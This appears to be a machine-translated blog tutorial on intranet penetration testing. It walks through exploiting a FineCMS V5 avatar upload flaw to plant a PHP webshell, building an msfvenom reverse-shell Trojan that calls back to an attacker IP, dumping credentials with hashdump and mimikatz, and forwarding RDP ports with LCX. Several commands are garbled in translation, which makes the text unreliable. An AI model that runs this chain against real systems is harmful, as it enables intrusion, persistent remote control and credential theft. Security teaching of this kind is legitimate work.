Different operating systems may have version vulnerabilities, middleware vulnerabilities, component vulnerabilities, port service vulnerabilities, etc. In the process of penetration testing, ideas can be obtained through information collection.
Idea of Intranet penetration
The idea of Intranet penetration is as follows: Through analyze the website information collection, by attacking the network server, server permissions, so as to obtain the network invasion of success and then take advantage of the network server as a springboard to attack other servers, network finally obtain sensitive data (system password, etc.), depends software installation backdoor Trojan horse or the back door, achieve long-term control and access to sensitive data. Another idea of Intranet penetration is to attack the computers and wireless networks of the enterprise office network through social work and other methods to control the office computers and then use the obtained office network data.
Detailed explanation of infiltration process
This penetration process will be divided into Webshell — > GetShell — > rights raising
Webshell visits a website, which uses FineCMS V5 system to create a new user for testing.
Preliminary judgment of the web template for finECMS V5 site building system, and then register a new user, convenient for us to use finECMS V5 system file upload vulnerability
Reference links:Blog.csdn.net/dfdhxb99539…
File upload vulnerability is in the member profile picture, so first register an account and then log in to upload our one-word Trojan
The initial file format is 0x0.png
Use burp proxy interception to replace image/ PNG after tx with image/ PHP
Input parameter v=phpinfo(); Authentication is successful
Verify the successful upload, open the kitchen knife software input upload site path and parameters (a word Trojan password), you can connect to the server
In the kitchen knife software can carry out the database rights, such as MOF rights, UDF rights, rights and so on
Write no-kill Trojan
Through webshell to connect to the target server, but access to the data is limited, only the site’s system account permissions, access to the system path is also limited, so we can write a no-kill Trojan to rebound shell Trojan su. Exe
Msfvenom -p Windows/x64 meterpreter/reverse_tcp lhost = 192.168.10.130 lport exe > = 4444 - f/root/Desktop/su. ExeCopy the code
Upload the tools we need in file management using the operation we just connected the kitchen knife
Enter the Meterpreter attack module and set parameters
Use exploits/multi/handlerSet payload/Windows/x64 meterpreter/reverse_tcpSet lport 4444 set lhost 192.168.10.130 runCopy the code
Virtual terminal can use kitchen knife simulation Win2008 server click to avoid killing Trojan operation, let the Trojan take effect
Run execution listener
Obtaining a Password
hashdumpload mimikatzkerberos
Copy the code
Note: If win2008 remote desktop operations are not allowed to connect to this computer, then port forwarding is useless
Enabling the Remote Desktop
Idea 1: Use the Meterpreter module to perform remote connection
Then enable port forwarding. -l (local port) -p (remote control port) -r (destination host)
Target plane port 3389 is forwarded to local port 5555
Rdesktop -u Username -p Password 127.0.0.1:5555 Connect to port 5555 on the local PC to enable the remote desktop
To open the remote desktop using Windows, you need to use LCX tool. Now enter commands in shell mode
Run lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389
Idea 2: Use LCX to perform remote connection
Attack aircraft execute LCX.exe. -listen 5555 33891, then open MSTSC connection 127.0.0.1:33891
The following is the connection success and the sending of listening data
conclusion
Different operating systems may have version vulnerabilities, middleware vulnerabilities, component vulnerabilities, port service vulnerabilities, etc. In the process of penetration testing, ideas can be obtained through information collection.
